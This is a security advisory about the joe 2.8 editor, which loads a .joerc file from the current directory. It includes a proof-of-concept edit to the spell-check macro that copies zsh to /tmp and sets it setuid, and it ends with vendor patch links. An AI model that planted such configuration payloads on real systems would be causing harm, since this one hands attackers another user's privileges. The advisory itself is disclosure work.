COMMAND
joe
SYSTEMS AFFECTED
Joseph Allen joe 2.8
PROBLEM
Following is based on a Wkit Security AB Advisory. joe looks for
its configuration file in ./.joerc (CWD), $HOME/.joerc, and
/usr/local/lib/joerc in that order. Users could be tricked into
execute commands if they open/edit a file with joe in a directory
where other users can write.
A user copy the default joerc file to a world writable directory
and change
:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
to
:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
4755 /tmp/suid",rtn,retype
Another user opens a file in that directory with joe and run
ispell with
^[l the result is a suid shell in /tmp
After looking through the patches that OpenBSD/FreeBSD/NetBSD has
for their joe ports, it looks like joe is still vulnerable in the
FreeBSD/NetBSD ports trees, but not in the OpenBSD ports tree as
of Dec 22 1998.
SOLUTION
For Red Hat:
ftp://updates.redhat.com/5.2/SRPMS/joe-2.8-43.52.src.rpm
ftp://updates.redhat.com/5.2/alpha/joe-2.8-43.52.alpha.rpm
ftp://updates.redhat.com/5.2/i386/joe-2.8-43.52.i386.rpm
ftp://updates.redhat.com/5.2/sparc/joe-2.8-43.52.sparc.rpm
ftp://updates.redhat.com/6.2/SRPMS/joe-2.8-43.62.src.rpm
ftp://updates.redhat.com/6.2/alpha/joe-2.8-43.62.alpha.rpm
ftp://updates.redhat.com/6.2/i386/joe-2.8-43.62.i386.rpm
ftp://updates.redhat.com/6.2/sparc/joe-2.8-43.62.sparc.rpm
ftp://updates.redhat.com/7.0/SRPMS/joe-2.8-43.7.src.rpm
ftp://updates.redhat.com/7.0/alpha/joe-2.8-43.7.alpha.rpm
ftp://updates.redhat.com/7.0/i386/joe-2.8-43.7.i386.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/joe-2.8-43.62_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/joe-2.8-43.62_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/joe-2.8-43.7_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/SRPMS/joe-2.8-43.7_imnx.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/joe-2.8-21.6mdk.i586.rpm
6.0/SRPMS/joe-2.8-21.6mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/joe-2.8-21.6mdk.i586.rpm
6.1/SRPMS/joe-2.8-21.6mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/joe-2.8-21.6mdk.i586.rpm
7.0/SRPMS/joe-2.8-21.6mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/joe-2.8-21.5mdk.i586.rpm
7.1/SRPMS/joe-2.8-21.5mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/joe-2.8-21.4mdk.i586.rpm
7.2/SRPMS/joe-2.8-21.4mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/joe-2.8-21.5mdk.i586.rpm
1.0.1/SRPMS/joe-2.8-21.5mdk.src.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/joe_2.8-15.3.diff.gz
http://security.debian.org/dists/stable/updates/main/source/joe_2.8-15.3.dsc
http://security.debian.org/dists/stable/updates/main/source/joe_2.8.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/joe_2.8-15.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/joe_2.8-15.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/joe_2.8-15.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/joe_2.8-15.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/joe_2.8-15.3_sparc.deb